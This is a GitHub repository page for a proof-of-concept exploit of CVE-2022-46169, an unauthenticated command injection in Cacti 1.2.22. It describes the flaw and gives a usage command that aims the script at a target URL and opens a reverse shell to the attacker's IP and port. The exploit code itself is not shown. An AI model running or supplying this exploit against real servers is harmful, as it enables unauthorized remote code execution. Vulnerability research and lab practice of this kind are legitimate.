Skip to content

PoC for CVE-2022-46169 that affects Cacti 1.2.22 version

Notifications You must be signed in to change notification settings

devilgothies/CVE-2022-46169

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

CVE-2022-46169 POC

This is a Proof of Concept (POC) script for the CVE-2022-46169 vulnerability that affects Cacti version 1.2.22.

Description

The CVE-2022-46169 vulnerability allows an unauthenticated command injection in Cacti versions through 1.2.22 in order to achieve unauthenticated remote code execution as the www-data user. The vulnerability is caused by improper validation of user input in the "host_id" parameter of the "remote_agent.php" file.

Usage

python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>

Replace <TARGET_URL> with the URL of the target Cacti installation, <YOUR_IP> with the IP address of the machine where you want to receive the reverse shell, and <YOUR_PORT> with the port number where you want to receive the reverse shell.

Example:

python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337

Disclaimer

This POC script is for educational purposes only. Use it at your own risk. The author of this script is not responsible for any damage caused by the use of this script. References

CVE-2022-46169 - CVE entry for the vulnerability.
Cacti Security Advisories in Github

About

PoC for CVE-2022-46169 that affects Cacti 1.2.22 version

Topics

Resources

Stars

Watchers

Forks

Languages